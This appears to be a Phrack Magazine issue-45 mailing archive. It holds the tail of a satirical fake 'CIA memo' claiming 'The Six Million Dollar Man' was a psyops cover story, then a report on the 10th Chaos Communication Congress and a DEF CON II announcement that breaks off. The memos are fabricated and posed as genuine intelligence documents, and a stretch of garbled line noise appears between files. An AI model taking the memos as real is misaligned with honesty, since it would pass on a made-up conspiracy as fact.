loose-cannon. Despite a massive, but low-key manhunt, the officially-dead ex-astronaut's whereabouts are currently unknown, though we have reason to believe he may have made his way to California or Texas. We suspect dissolution with the American space program -- CAPRICORN, in particular -- may lead Grissom to go public and compromise UMENSCH and CAPRICORN. BACKGROUND, PROJECT DPULTRA ---------- ------- ------- "The most convincing lie is the one that's half true..." -- Samuel Butler DPULTRA is a damage-control project of utmost priority. Its goal is to desensitize the American public to the potential existence of a BIONIC-enabled man and secondarily, any allegations concerning CAPRICORN, the ludicrous portrayal of the first discrediting the second. PSYOPS' proposed project involves the production of a network television show, produced in part with Company funds, Pro-US propagandizing, which will lionize the American Intelligence Community and plant the seed in the public's mind that projects like CAPRICORN and UMENSCH are impossible -- due to the inherent silliness of the show's plotlines, week after week. (4) This memorandum is VIOLET and SENSITIVE; Do not circulate in paper or electronic form outside of your section. [CONTINUE] ^M DL 433-54-3937 10/28/71 Central Intelligence Agency Internal Memorandum PPYRUS SECTION This memorandum is VIOLET and SENSITIVE; Do not circulate in paper or electronic form outside of your section. BACKGROUND, PROJECT DPULTRA (cont'd) ---------- ------- ------- DPULTRA's success is directly related to the Nielsen ratings it can garnish and to ensure its success, PSYOPS personnel will be involved in writing the scripts. PSYOPS suggests peppering the show's plots with psychological archetypes -- symbols from Jung's collective unconscious -- and possibly even subliminals (if need be). The story line will, nevertheless, be played straight but also utterly implausibly. I would like to discuss DPULTRA further with you in person at our next Monday-morning meeting. (5) This memorandum is VIOLET and SENSITIVE; Do not circulate in paper or electronic form outside of your section. [CONTINUE] ^M DL 433-54-3958 11/07/71 Central Intelligence Agency Internal Memorandum PPYRUS SECTION This memorandum is VIOLET and SENSITIVE; Do not circulate in paper or electronic form outside of your section. TO: Thomas J. Kelley, Director, PPYRUS Section FROM: Bill Brown, PP Deputy Chief SUBJ: DPULTRA PROJECT DPULTRA OUTLINE ------- ------- ------- Following our meeting Monday, this is an update on DPULTRA. In keeping with our RMD objectives, we've begun working on ideas this week. Much progress, although finished scripts are probably a month or two away, depending on the final series terms from American Broadcasting. WeUve settled on character names and sketches: DRAMATIS PERSONAE Dr. Rudy Wells, An otherwise unremarkable man, the genius behind BIONICs Oscar Goldman, Director of a secret governmental intelligence agency, OSI Steve Austin, Astronaut/Test Pilot/OSI Agent; renowned as the first Man on the Moon. Similarity to the name Sam Houston results from the necessity to attract Texas viewers particularly (as well as Californians). Following is a list of show ideas for the first season, along with input from the PSYOPS officers. PSYOPS wants us to plant collective archetypes and possibly subliminals in order to carve the show's subtext into the mind as deep as possible, and to generate the largest market share possible. These psychological implants will be joined with or disguised under ephemeral pop culture references, such as UFOs, Aztecs, Bigfoot, Cold Warrior, Earthquakes, the mystique of the American Indian, and the paranormal. (1) This memorandum is VIOLET and SENSITIVE; Do not circulate in paper or electronic form outside of your section. [CONTINUE] ^M DL 433-54-3958 11/07/71 Central Intelligence Agency Internal Memorandum PPYRUS SECTION This memorandum is VIOLET and SENSITIVE; Do not circulate in paper or electronic form outside of your section. PROJECT DPULTRA OUTLINE (cont'd) ------- ------- ------- SUPPORTING CHARACTERS Venus Probe, Earth-launched probe mistakenly returns, wreaking havoc Sasquatch, Otherwise known as "Big Foot"; a UFOnaut with BIONICs Farrah Fawcett, Reporter/Journalist foil for Steve Austin Aztec Warrior, _Chariots of the Gods_ to its ultimate conclusion Bionic Boy, Temporarily BIONIC-enabled Gary Savin, Heretofore unknown, rogue $7 million man William Shatner, ...and dolphins. "Something Wonderful..." happens to astronaut Bill on one of his space-walks Fembots, Female grotesques; "All this, and BIONICs, too!" Evil androids created by an unnamed, nefarious agency Abridged list of possible episodes include: Sasquatch --------- During an OSI science investigation of the San Andreas fault in the wilderness of Northern California, Steve encounters Big Foot. Steve later learns that Big Foot is the product of extra-terrestrial genetics and cybernetics, but his purpose on Earth is never clarified. In a later episode, Steve re-visits the heavily forrested area and initiates a friendship with Sasquatch, eventually saving his life. Venus Probe ----------- An interplanetary probe (like the planned Viking probes) destined for Venus slingshots through the alien atmosphere and returns to Earth. Its computer program doesn't realize that anything's wrong, so it begins its collection routines. Unfortunately, it has returned to our planet with an extremely tough armor plating (resulting from a chemical reaction with Venus's atmosphere) and it's zigzagging its way through Southern California. It possesses wicked collection equipment which in this environment are effective weapons. Anyone who gets near it is in great danger. Eventually, Steve and the national guard defeat the device by luring it into an open pit filled with very caustic acid. (2) This memorandum is VIOLET and SENSITIVE; Do not circulate in paper or electronic form outside of your section. [CONTINUE] ^M DL 433-54-3958 11/07/71 Central Intelligence Agency Internal Memorandum PPYRUS SECTION This memorandum is VIOLET and SENSITIVE; Do not circulate in paper or electronic form outside of your section. PROJECT DPULTRA OUTLINE (cont'd) ------- ------- ------- Amnesia ------- As the result of a head injury, Steve is stricken with amnesia. Consequently, forgets that he possesses bionic powers. He ends up living out an alternate possible life -- moves in with a woman and gets a job as a construction worker. Everything is fine until Steve happens upon a woman and her child, pinned inside a wrecked car. He tears away the metal and extricates the people, who are grateful but become frightened when they see wires sticking out of a tear in his flannel shirt. Eventually, OSI catches up to him before anything too out of hand occurs, and Steve regains his memory by episode's end. If this show is a success in its first season, PSYOPS would like to consider a spin-off involving a second BIONIC character. The spin-off would include: ADDITIONAL CHARACTERS Jamie Sommers, Substitute Teacher/ex-Tennis Pro; an unlikely OSI agent; A love-interest for Steve, Jamie obtains her BIONICs after a parachuting accident Max the Dog, Formerly a laboratory subject, horribly burnt in a fire; Now BIONIC-enabled. Psychologically traumatized, Max goes berserk at the first sign of flame Jamie Sommers ------------- Jamie, a Junior Highschool substitute teacher and ex-Tennis pro, and Steve are engaged to be married. At this point, Jamie knows nothing of Steve's involvement with OSI or his BIONIC abilities. On a vacation parachuting trip, Jamie is injured, paralyzed. Steve pleads with Dr. Wells to restore her limbs through BIONICs. Wells accedes. Except that Jamie has amnesia and has no idea who Steve is. Jamie is instructed in her new BIONIC abilities, and begins to exercise them, when her body rejects the BIONIC implants, physically and emotionally traumatizing Jamie. OSI eventually solves the implant rejection problem, but Rudi cautions Steve that if he tells her of her past, it may induce the trauma of the BIONIC rejection. Steve lives with the pain of knowing that Jamie is his first love and that, for fear of her safety, can never tell her. (3) This memorandum is VIOLET and SENSITIVE; Do not circulate in paper or electronic form outside of your section. [CONTINUE] ^M DL 433-54-3958 11/07/71 Central Intelligence Agency Internal Memorandum PPYRUS SECTION This memorandum is VIOLET and SENSITIVE; Do not circulate in paper or electronic form outside of your section. PROJECT DPULTRA OUTLINE (cont'd) ------- ------- ------- Aztec Warrior ----- ------- Investigating an abandoned WW II bunker along the California coast which seems to be emitting powerful radio-frequencies, Jamie discovers that an ancient Aztec pyramid lies below the bunker's foundation and is now accessible through a hidden tunnel. In the pyramid, Jamie is confronted with an 800-year-old Aztec warrior bent on protecting the contents of the pyramid and repelling intruders. In an allusion to CHARIOTS OF THE GODS, extra-terrestrials are receiving from the pyramid's beacon the electronic version of an invitation to re-visit the planet. Jamie learns, however, that chemicals seeded into the atmosphere as part of a NASA project to end continental drought will ultimately interfere with the propulsion system of the alien craft. Fearing the accidental destruction of the aliens will bring extra-terrestrial retaliation, Jamie thwarts the Aztec guard and destroys the beacon. (4) This memorandum is VIOLET and SENSITIVE; Do not circulate in paper or electronic form outside of your section. [CONTINUE] ^M DL 433-54-3958 12/10/73 Central Intelligence Agency Internal Memorandum PPYRUS SECTION This memorandum is VIOLET and SENSITIVE; Do not circulate in paper or electronic form outside of your section. TO: Bill Brown, PP Deputy Chief FROM: Thomas J. Kelley, Director, PPYRUS Section SUBJ: DPULTRA Nearly two years into the project, I congratulate you on DPULTRA's success; the show has consistently rated high in the Nielsens, topping "Starsky & Hutch" and occasionally beating out "M*A*S*H*". However, there seem to be several problems and the show requires a nearly intolerable suspension of disbelief. To wit: 1. Running at 60 mph, why doesn't the Bionic Man's sneakers ever wear out? 2. Steve Austin never received a Bionic heart, spine, respiratory system, musculature or skeleture. How is it that his body doesn't collapse when he lifts objects that weigh tons? 3. Most of Steve's body seems to be metallic; how does he make it past airport metal detectors? 4. How can Steve's Bionics defy principles of physics, like inertia? 5. Steve's Bionic implants are nuclear-powered -- an energy source potentially capable of generating more heat than the sun. How can Steve's Bionics slow down and even fail, when exposed to cold? 6. Steve Austin's Bionics cost $6 Million -- a sum that seems laughably inexpensive. Why is the Bionic Woman's pricetag Classified? 7. How can a world-famous, instantly recognizable astronaut make a "perfect undercover agent"? 8. A bionic dog? What's next? A bionic earthworm? A bionic tarantula? 9. Jamie Sommers' cover includes continuing her vocation as a substitute teacher; how does she make time to be a secret agent? 10. Where do the Fembots come from? Are they important to the show? 11. Re: The Venus Probe episode -- why is a probe whose purpose is to collect soil samples, heavily endowed with weapons? How can that probe not realize it's not on Venus? If it's armored enough to withstand the atmosphere of Venus, how was Steve able to destroy it in a pit of acid? Why was it malevolent? DAivZXUnj g'J O~~>o8/F?=_.~ OWo_|oc^{?N>>~|\oH +z oz (&+ tN81|@rG-TNx:^P Wa_OzV2/@_9H^S3L|`-A;k:mF".sxHta M s `wPzm?}FyN|6/h !.x]iC NO CARRIER ------------------------[ END OF FILE ]---------------------------- From phrack@well.sf.ca.us Thu Mar 31 18:36:29 1994 Received: from well.sf.ca.us by fido.wps.com (5.67/wps.com-hackery) id AA18066; Thu, 31 Mar 94 18:36:16 -0800 Received: (from phrack@localhost) by well.sf.ca.us (8.6.8/8.6.6) id XAA01375; Wed, 30 Mar 1994 23:44:22 -0800 Date: Wed, 30 Mar 1994 23:44:22 -0800 From: Chris Goggans Message-Id: <199403310744.XAA01375@well.sf.ca.us> To: phrack-list@well.sf.ca.us Subject: P45-13 Status: O ==Phrack Magazine== Volume Five, Issue Forty-Five, File 13 of 28 **************************************************************************** The 10th Chaos Computer Congress by Manny E. Farber Armed only with an invitation in English addressed to the "global community" and a small pile of German Marks, I arrived at the Eidelstedter Buergerhaus about an hour or so before the beginning of the 10th Chaos Communication Congress (subtitled "Ten years after Orwell"), sponsored by the (in)famous Chaos Computer Club. The Buergerhaus (literally, "citizen's house") turned out to be a modest community hall; needless to say, not all invited showed up. The Congress took place between the 27th and the 29th of December. As the title implies, social as well as technical issues were on the docket. After forking over 30 DM (about $20) for a pass for the first two days of the Congress, I sort of felt like asking for a schedule, but refrained, thinking that asking for scheduled chaos might seem a bit odd. I went to the cafeteria for breakfast. An organizer started out announcing, "Anyone who wants to eat breakfast pays 5 Marks, and gets a stamp, which--no, rather, anyone who wants breakfast pays 5 Marks and eats breakfast." The atmosphere was quite collegial and informal, with little more order than was absolutely necessary. The approximately 150 attendees were predominantly German (a few from Switzerland and Holland, at least -- and probably only -- one from the United States, namely myself), male, and technically oriented. (During an explanation of the mathematical algorithm underlying electronic cash, a non-techie objected, "But I don't want to have to think up a 200-digit random number every time I buy something!" It was explained to him that this was done by software in the chip-card ...). Although not mentioned in the invitation, not a word of English was to be heard; all the events were conducted in German. Some were conducted in a "talk show" format, with a host asking questions, simplifying answers, making jokes. A television network carried the video from the auditorium to other rooms throughout the building (albeit without sound) along with up-to-the-minute event schedules. The tone of the discussions of how electronic cash could be embezzled, or chip cards abused, digital signatures forged, etc., was constructive rather than destructive. And it was balanced, i.e. not only "how could a malicious individual embezzle money?" was discussed, but also "how could the government use chip cards to reduce people's privacy?" Here, the "hackers" were hackers in the positive sense of understanding a technology, not in the negative sense of wreaking havoc. It was, however, noted that trying out a potential weakness of the "EuroScheck" cash cards was quite easy: it would require buying a card reader for 1,500 DM and maybe a week of time. The question of technical solutions to "big brother" did come up in the presentations about chip cards. The danger is that a pile of cards is eliminated in favor of a card containing someone's driver's license, driving record (maybe), employee information, credit information, etc. etc. A chip card could theoretically be programed to give out *only* the information absolutely necessary, e.g. telling a policeman only that someone is allowed to drive, without disclosing his identity. The "Hackzentrum" (Hacking Center) turned out to be a room filled with networked computers and people hacking on them. It seemed mostly harmless. (I nevertheless did not try a remote login -- I had no reason to doubt good intentions, but on the other hand, who knows who wrote or replaced the keyboard driver and what sort of supplemental functionality it might have?) The packet radio room had a "Digi" repeating station and, true to the ham radio tradition, where the conversation centers on who is talking to whom and how well they hear each other and on what other frequency they might hear each other better, the computers attached were mostly displaying maps of the packet radio network itself. I didn't delve very deeply into the "Chaos Archive," but noticed a collection of maintenance sheets for telephone equipment among CCC newsletters and other paraphenalia. Some "signs of the Congress": - Bumper sticker: "I (heart) your computer" - Telephone stickers: "Achtung, Abhoergefahr" ("Attention, Eavesdropping danger"; and the German PTT logo transformed into a pirate insignia, with the words "Telefun - Mobilpunk" (derived from "Telefon - Mobilfunk") - T-shirt: "Watching them (eye-ball) watching us" - Post-It Note pad (for sale for DM 1.50): a pad of about 50, pre-printed with a hand-written note: "Vorsicht, Stoerung. Automat macht Karte ungueltig" ("Careful--Defect. Machine makes card invalid") - Word coinage: "Gopher-space" - Stamp: "ORIGINALE KOPIE" ("ORIGINAL COPY") The press were told not to take pictures of anyone without their explicit permission. Schedules were distributed throughout the Congress. By the evening of the 27th, a schedule for the 28th, "Fahrplan 28.12 Version 2.0," was already available ("Fahrplan" means a bus/train schedule; this is presumably an "in" joke). By 17:30 on the 28th, "Fahrplan 28.12 Version 2.7" was being distributed. (I missed most of the intervening versions; presumably they were neatly filed away in the Chaos Archive by then ...) The scheduled events (in translation) were as follows; a "*" means that I have included some comments later in this report: December 27, 1993 - Welcoming/opening - How does a computer work? - ISDN: Everything over one network - Internet and multimedia applications: MIME/Mosaik/Gopher - Data transport for beginners - Chip-cards: Technology * Media and information structures: How much truth remains? Direct democracy: information needs of the citizen - Encryption for beginners, the practical application of PGP * Alternative networks: ZAMIRNET, APS+Hacktic, Green-Net, Knoopunt, Z-Netz and CL December 28, 1993 - Encryption: Principles, Systems, and Visions - Modacom "wireless modem" - Electronic Cash - Bulletin board protocols: Functional comparison and social form, with the example of citizen participation - Discussion with journalist Eva Weber - Net groups for students, Jan Ulbrich, DFN * What's left after the eavesdropping attack? Forbidding encryption? Panel: Mitglied des Bundestags (Member of Parliament) Peter Paterna, Datenschutz Beauftragter Hamburg (Data privacy official) Peter Schar, a journalist from Die Zeit, a representative from the German PTT, a student writing a book about related issues, and a few members of the Chaos Computer Club - Cyber Bla: Info-cram * How does an intelligence service work? Training videos from the "Stasi" Ministrium fuer STAatsSIcherheit (Ministry for National Security) - System theory and Info-policies with Thomas Barth - Science Fiction video session: Krieg der Eispiraten ("War of the ice pirates") December 29, 1993 - Thoughts about organization ("Urheben") - Computer recycling - Dumbness in the nets: Electronic warfare - Lockpicking: About opening locks - The Arbeitsgemeinschaft freier Mailboxen introduces itself - In year 10 after Orwell ... Visions of the hacker scene ------------------------------------------------------------------------------- THE EAVESDROPING ATTACK This has to do with a proposed law making its way through the German Parliament. The invitation describes this as "a proposed law reform allowing state authorities to listen in, even in private rooms, in order to fight organized crime." This session was the centerpiece of the Congress. Bayerische Rundfunk, the Bavarian sender, sent a reporter (or at least a big microphone with their logo on it). The panel consisted of: MdB - Mitglied des Bundestags (Member of Parliament) Peter Paterna DsB - Datenschutz Beauftragter Hamburg (Data privacy official) Peter Schar Journalist - from Die Zeit PTT - a representative from the German PTT Student - writing a book about related issues CCC - a few members of the Chaos Computer Club My notes are significantly less than a word-for-word transcript. In the following, I have not only excerpted and translated, but reorganized comments to make the threads easier to follow. IS IT JUSTIFIED? MdB - There is massive concern ("Beunruhigung") in Germany: 7 million crimes last year. Using the US as comparison for effectiveness of eavesdroping, it's only applicable in about 10-20 cases: this has nothing to do with the 7 million. The congress is nevertheless reacting to the 7 million, not to the specifics. In principle, I am opposed and have concerns about opening a Pandora's box. CCC #1 - The 7 million crimes does not surprise me in the least. I am convinced that there is a clear relationship between the number of laws and the number of crimes. When you make more laws, you have more crimes. Every second action in this country is illegal. Journalist - Laws/crimes correlation is an over-simplification. There are more murders, even though there are no more laws against it. MdB - There is a conflict between internal security, protecting the constitution, and civil rights. How dangerous is 6 billion Marks of washed drug money to the nation? Taking the US as an example, the corrosion may have gone so far that it's too late to undo it. I hope that this point hasn't been reached yet in Germany. DsB - I am worried about a slippery slope. There is a tradeoff between freedom and security, and this is the wrong place to make it; other more effective measures aren't being taken up. EFFECTIVENESS OF CONTROLS ON EAVESDROPING MdB - Supposedly federal controls are effective. Although there are very few eavesdroping cases, even if you look at those that are court-approved, it's increasing exponentially. No proper brakes are built into the system. As for controls for eavesdroping by the intelligence service, there is a committee of three members of parliament, to whom all cases must be presented. They have final say, and I know one of the three, and have relatively much trust in him. They are also allowed to go into any PTT facility anytime, unannounced, to see whether or not something is being tapped or not. MdB - Policies for eavesdroping: if no trace of an applicable conversation is heard within the first "n" minutes, they must terminate the eavesdroping [...] The question is, at which point the most effective brakes and regulations should be applied: in the constitution? in the practice? PTT - True, but often the actual words spoken is not important, rather who spoke with whom, and when. DsB - There is no catalog for crimes, saying what measures can be applied in investigating which crimes. It's quite possible to use them for simple crimes, e.g. speeding. There is no law saying that the PTT *has to* store data; they *may*. They can choose technical and organizational solutions that don't require it. MdB - This is a valid point, I don't waive responsibility for such details. The PTT could be required to wipe out detailed information as soon as it is no longer needed, e.g. after the customer has been billed for a call. TECHNICAL TRENDS Journalist - Digital network techniques make it easy to keep trails, and there is an electronic trail produced as waste product, which can be used for billing as well as for other purposes. Load measurements are allowable, but it can also be used for tracking movements. DsB - The PTT claims they need detailed network data to better plan the network. The government says they need details in order to be able to govern us better. DsB - In the past, the trend has always been to increasingly identificable phone cards. There is economic pressure on the customer to use a billing card instead of a cash card, since a telephone unit costs less. With "picocells," your movement profile is getting more and more visible. PTT - As for the trend towards less-anonymous billing-cards: with the new ISDN networks, this is necessary. Billing is a major cost, and this is just a technical priority. Student - As for techniques to reduce potential for eavesdroping, it is for example technically possible to address a mobile phone without the network operator needing to know its position. Why aren't such things being pursued? PTT - UMTS is quite preliminary and not necessarily economically feasible. [Comments about debit cards]. We have more interest in customer trust than anything else. But when something is according to the law, we have no option other than to carry it out. But we don't do it gladly. THE BIG CONSPIRACY? CCC #2 - I don't give a shit about these phone conversations being overheard. I want to know why there is such a big controversy. Who wants what? Why is this so important? Why so much effort? Why are so many Mafia films being shown on TV when the eavesdroping law is being discussed? What's up? Why, and who are the people? Student - I am writing a book about this, and I haven't figured this out myself. My best theory: there are some politicians who have lost their detailed outlook ("Feinbild"), and they should be done away with ("abgeschaffen"). PTT - We're in a difficult position, with immense investments needed to be able to overhear phone conversations [in digital networks (?)]. We have no interest in a cover-up. MdB - As for the earlier question about what NATO countries may do. During the occupation of Berlin, they did want they wanted on the networks. In western Germany, it has always been debated. Funny business has never been proved, nor has suspicion been cleared up. CCC #2 - After further thought, I have another theory. American companies are interested in spying on German companies in order to get a jump on their product offerings. MdB - That's clear, but there are more benign explanations. Government offices tend towards creating work. Individuals are promoted if their offices expand, and they look for new fields to be busy in. In Bonn, we've gone from 4,000 people to 24,000 since the 50's. CCC #1 (to MdB) - Honestly, I don't see why you people in Bonn are anything other than one of these impenetrable bureaucracies like you described, inaccessible, out of touch with reality, and interested only in justifying their own existence. MdB - Well, *my* federal government isn't that. CLIPPER CHIP CONTROVERSY Student - Observation/concern: in the US, AT&T's encryption system is cheap and weak. If this becomes a de facto standard, it is much harder to introduce a better one later. Journalist - In the US, the Clipper chip controversy has centered more on the lost business opportunities for encryption technology, not on principles. There every suggestion for forbidding encryption has encountered stiff opposition. Student - As for the Clipper algorithm, it's quite easy to invite three experts to cursorily examine an algorithm (they weren't allowed to take documents home to study it) and then sign-off that they have no complaints. Journalist - As for the cursory rubber-stamping by the three experts who certified the Clipper algorithm, my information is that they had multiple days of computing days on a supercomputer available. I don't see a problem with the algorithm. The problem lies in the "trust centers" that manage the keys. I personally don't see why the whole question of cryptology is at all open ("zugaenglich") for the government. CONCLUDING REMARKS DsB - The question is not only whether or not politicians are separated from what the citizens want, but also of what the citizens want. Germans have a tendency to valuing security. Different tradition in the US, and less eavesdroping. I can imagine how the basic law ("Grundgesetz") could be eliminated in favor of regulations designed to reduce eavesdroping, the trade-off you (MdB) mentioned earlier. The headlines would look like "fewer cases of eavesdroping", "checks built in to the system," etc., everyone would be happy, and then once the law has been abolished, it would creep back up, and then there's no limit. MdB - (Nods agreement) CCC #2 - There are things that must be administered centrally (like the PTT), and the government is the natural choice, but I suggest that we don't speak of the "government," but rather of "coordination." This reduces the perceived "required power" aspect ... As a closing remark, I would like to suggest that we take a broader perspective, assume that a person may commit e.g. 5,000 DM more of theft in his lifetime, live with that, and save e.g. 100,000 DM in taxes trying to prevent this degree of theft. ------------------------------------------------------------------------------- MEDIA AND INFORMATION STRUCTURES In this session, a lot of time was wasted in pointless philosophical discussion of what is meant by Truth, although once this topic was forcefully ignored, some interesting points came up (I don't necessarily agree or disagree with these): - In electronic media, the receiver has more responsibility for judging truth placed on his shoulders. He can no longer assume that the sender is accountable. With "Network Trust," you would know someone who knows what's worthwhile, rather than filtering the deluge yourself. A primitive form of this already exists in the form of Usenet "kill" files. - A large portion of Usenet blather is due to people who just got their accounts cross-posting to the entire world. The actual posting is not the problem, rather that others follow it up with a few dozen messages debating whether or not it's really mis-posted, or argue that they should stop discussing it, etc. People are beginning to learn however, and the ripple effect is diminishing. - Companies such as Microsoft are afraid of the Internet, because its distributed form of software development means they are no longer the only ones able to marshal 100 or 1,000 people for a windowing system like X-Windows or Microsoft Windows. - If someone is trying to be nasty and knows what he's doing, a Usenet posting can be made to cost $500,000 in network bandwidth, disk space, etc. - At a Dutch university, about 50% of the network bandwidth could have been saved if copies of Playboy were placed in the terminal rooms. Such technical refinements as Gopher caching daemons pale in comparison. - All e-mail into or out of China goes through one node. Suspicious, isn't it? ------------------------------------------------------------------------------- ALTERNATIVE NETWORKS Several people reported about computer networks they set up and are operating. A sampling: APS+Hacktic - Rop Gonggrijp reported about networking services for the masses, namely Unix and Internet for about $15 per month, in Holland. There are currently 1,000 subscribers, and the funding is sufficient to break even and to expand to keep up with exponential demand. A German reported about efforts to provide e-mail to regions of ex-Yugoslavia that are severed from one another, either due to destroyed telephone lines or to phone lines being shut off by the government. A foundation provided them with the funds to use London (later Vienna), which is reachable from both regions, as a common node. The original author of the Zerberus mail system used on many private German networks complained about the degree of meta-discussion and how his program was being used for people to complain about who is paying what for networking services and so forth. He said he did not create it for such non-substantial blather. The difference between now and several years ago is that now there are networks that work, technically, and the problem is how to use them in a worthwhile manner. A German of Turkish origin is trying to allow Turks in Turkey to participate in relevant discussions on German networks (in German) and is providing translating services (if I heard right, some of this was being done in Sweden). This killed the rest of the session, which degenerated into a discussion of which languages were/are/should be used on which networks. ------------------------------------------------------------------------------- HOW AN INTELLIGENCE SERVICE WORKS: STASI TRAINING VIDEOS The person introducing the videos sat on the stage, the room darkened. The camera blotted out his upper body and face; all that was to see on the video, projected behind him, was a pair of hands moving around. It apparently didn't take much to earn a file in the Stasi archives. And once you were in there, the "10 W's: Wo/wann/warum/mit wem/..." ("where/when/why/with whom/...") ensured that the file, as well as those of your acquaintances, grew. The videos reported the following "case studies": - The tale of "Eva," whose materialistic lifestyle, contacts with Western capitalists, and "Abenteuerromantik" tendencies made her a clear danger to the state, as well as a valuable operative. She swore allegiance to the Stasi and was recruited. Eventually the good working relationship deteriorated, and the Stasi had to prevent her from trying to escape to the West. The video showed how the different parts of the intelligence service worked together. - A member of the military made a call to the consulate of West Germany in Hungary. The list of 10,000 possible travellers to Hungary in the relevant time frame was narrowed down to 6,000 on the basis of a determination of age and accent from the recorded conversation, then down to 80 by who would have any secrets to sell, then down to three (by hunch? I don't remember now). One video showed how a subversive was discreetly arrested. Cameras throughout the city were used to track his movements. When he arrived at his home, a few workers were "fixing" the door, which they claimed couldn't be opened at the moment. They walked him over to the next building to show him the entrance, and arrested him there. A dinky little East German car comes up, six people pile into it. Two uniformed police stand on the sidewalk pretending nothing is happening. From phrack@well.sf.ca.us Thu Mar 31 20:10:03 1994 Received: from well.sf.ca.us by fido.wps.com (5.67/wps.com-hackery) id AA18448; Thu, 31 Mar 94 20:09:44 -0800 Received: (from phrack@localhost) by well.sf.ca.us (8.6.8/8.6.6) id XAA01445; Wed, 30 Mar 1994 23:44:48 -0800 Date: Wed, 30 Mar 1994 23:44:48 -0800 From: Chris Goggans Message-Id: <199403310744.XAA01445@well.sf.ca.us> To: phrack-list@well.sf.ca.us Subject: P45-14 Status: O ==Phrack Magazine== Volume Five, Issue Forty-Five, File 14 of 28 **************************************************************************** Updated Last : 3.14.1994 Late Night Hack Announcement #4.2 XXXXXXXXXXXXXXXXXXXXXXXX XX DEF CON II Convention Update Announcement XXXXXXXxxxxXXXXXXXXXXXXXXX XX DEF CON II Convention Update Announcement XXXXXXxxxxxxXXXXXX X X DEF CON II Convention Update Announcement XXXXXxxxxxxxxXXXXXXX X DEF CON II Convention Update Announcement XXXXxxxxxxxxxxXXXX XXXXXXXXX DEF CON II Convention Update Announcement XXXxxxxxxxxxxxxXXXXXXXXXX X DEF CON II Convention Update Announcement XXxxxxxxxxxxxxxxXXXXXX XX X DEF CON II Convention Update Announcement XXXxxxxxxxxxxxxXXXXXXXX DEF CON II Convention Update Announcement XXXXxxxxxxxxxxXXXXXXXX X XX DEF CON II Convention Update Announcement XXXXXxxxxxxxxXXXXXXXXXX XX X DEF CON II Convention Update Announcement XXXXXXxxxxxxXXXXXXXXX X DEF CON II Convention Update Announcement XXXXXXXxxxxXXXXXXXXXXXXXXX DEF CON II Convention Update Announcement XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX DEF CON II Convention Update Announcement READ & DISTRIBUTE & READ & DISTRIBUTE & READ & DISTRIBUTE & READ & DISTRIBUTE ============================================================================= What's this? This is an updated announcement and invitation to DEF CON II, a convention for the "underground" elements of the computer culture. We try to target the (Fill in your favorite word here): Hackers, Phreaks, Hammies, Virii Coders, Programmers, Crackers, Cyberpunk Wannabees, Civil Liberties Groups, CypherPunks, Futurists, Artists, Etc.. WHO: You know who you are, you shady characters. WHAT: A convention for you to meet, party, and listen to some speeches that you would normally never hear. WHEN: July 22, 23, 24 - 1994 (Speaking on the 23rd and 24th) WHERE: Las Vegas, Nevada @ The Sahara Hotel So you heard about DEF CON I, and want to hit part II? You heard about the parties, the info discussed, the bizarre atmosphere of Las Vegas and want to check it out in person? Load up your laptop muffy, we're heading to Vegas! Here is what Three out of Three people said about last years convention: "DEF CON I, last week in Las Vegas, was both the strangest and the best computer event I have attended in years." -- Robert X. Cringely, Info World "Toto, I don't think we're at COMDEX anymore." -- CodeRipper, Gray Areas "Soon we were at the hotel going through the spoils: fax sheets, catalogs, bits of torn paper, a few McDonald's Dino-Meals and lots of coffee grounds. The documents disappeared in seconds." -- Gillian Newson, New Media Magazine DESCRIPTION: Last year we held DEF CON I, which went over great, and this year we are planning on being bigger and better. We have expanded the number of speakers to included midnight tech talks and additional speaking on Sunday. We attempt to bring the underground into contact with "legitimate" speakers. Sure it's great to meet and party with fellow hackers, but besides that we try to provide information and speakers in a forum that can't be found at other conferences. While there is an initial concern that this is just another excuse for the evil hackers to party and wreak havoc, it's just not the case. People come to DEF CON for information and for making contacts. We strive to distinguish this convention from others in that respect. WHAT'S NEW THIS YEAR: This year will be much larger and more organized (hopefully) than last year. We have a much larger meeting area, and have better name recognition. Because of this we will have more speakers on broader topics. Expect speaking to run Saturday and Sunday, ending around 5 p.m. Some of the new things expected include: > An Internet connection with sixteen ports will be there, _BUT_ will only provide serial connections because terminals are too hard to ship. So bring a laptop with communications software if you want to connect to the network. Thanks to cyberlink communications for the connection. > There will be door prizes, and someone has already donated a Cell Phone and a few "Forbidden Subjects" cd ROMs to give away, thanks to Dead Addict. > Dr. Ludwig will present his virus creation awards on Sunday. > A bigger and better "Spot The Fed" contest, which means more shirts to give away. > More room, we should have tables set up for information distribution. If you have anything you want distributed, feel free to leave it on the designated tables. Yes, this year there will be a true 24 hour convention space. > A 24 hour movie / video suite where we will be playing all type of stuff. VHS Format. Mail me with suggested titles to show, or bring your own. We'll use a wall projector when not in use by speakers. > Midnight Tech Talks on Friday and Saturday night to cover the more technical topics and leave the days free for more general discussions. WHO IS SPEAKING:============================================================= This list represents almost all of the speakers verified to date. Some people do not want to be announced until the event for various reasons, or are waiting for approval from employers. A speaking schedule will go out in the next announcement. Philip Zimmerman, Notorious Cryptographer & Author of PGP. Dr. Ludwig, Author of "The Little Black Book of Computer Viruses," and "Computer Viruses, Artificial Life and Evolution" Loyd Blankenship (The Mentor), Net Running in the 90's and RPG. Padgett Peterson, Computer Enthusiast, Anti-Virus Programmer. The Jackal, A Radio Communications Overview, Digital Radio and the Hack Angle. Judi Clark, Computer Professionals for Social Responsibility. Gail Thackery, (Of Operation Sun Devil Fame), Topic to be Announced. To be Announced, The Software Publishers Association, Topic to be Announced. Toni Aimes, Ex U.S. West Cellular Fraud, Cellular Fraud Topics. Mark Lotter, Cellular Enthusiast, Hacking Cell Phones. Lorax, The Lighter Side of VMBs. Peter Shipley, Unix Stud, Q&A on Unix Security. George Smith, Crypt Newsletter, Virus Topic to be Announced. Cathy Compton, Attorney, Q&A Surrounding Seizure Issues, Etc. John Littman, Reporter and Author, Kevin Poulson, Mitnick, and Agent Steal. Red Five & Hellbender, Madmen With a Camcorder, Who Knows? Erik Bloodaxe, Phrack Editor, Wierd Wireless Psycho Shit.. Stay Tuned.. There should be a few round table discussions on Virus, Cellular, Unix and something else surrounding the industry. I'll name the rest of the speakers as they confirm. I'm still working on a few (Two?) people and groups, so hopefully things will work out and I can pass the good news on in the next announcement, or over our List Server. ============================================================================ WHERE THIS THING IS: It's in Las Vegas, the town that never sleeps. Really. There are no clocks anywhere in an attempt to lull you into believing the day never ends. Talk about virtual reality, this place fits the bill with no clunky hardware. If you have a buzz you may never know the difference. It will be at the Sahara Hotel. Intel is as follows: The Sahara Hotel: 1.800.634.6078 Room Rates: Single/Double $55, Triple $65, Suite $120 (Usually $200) + 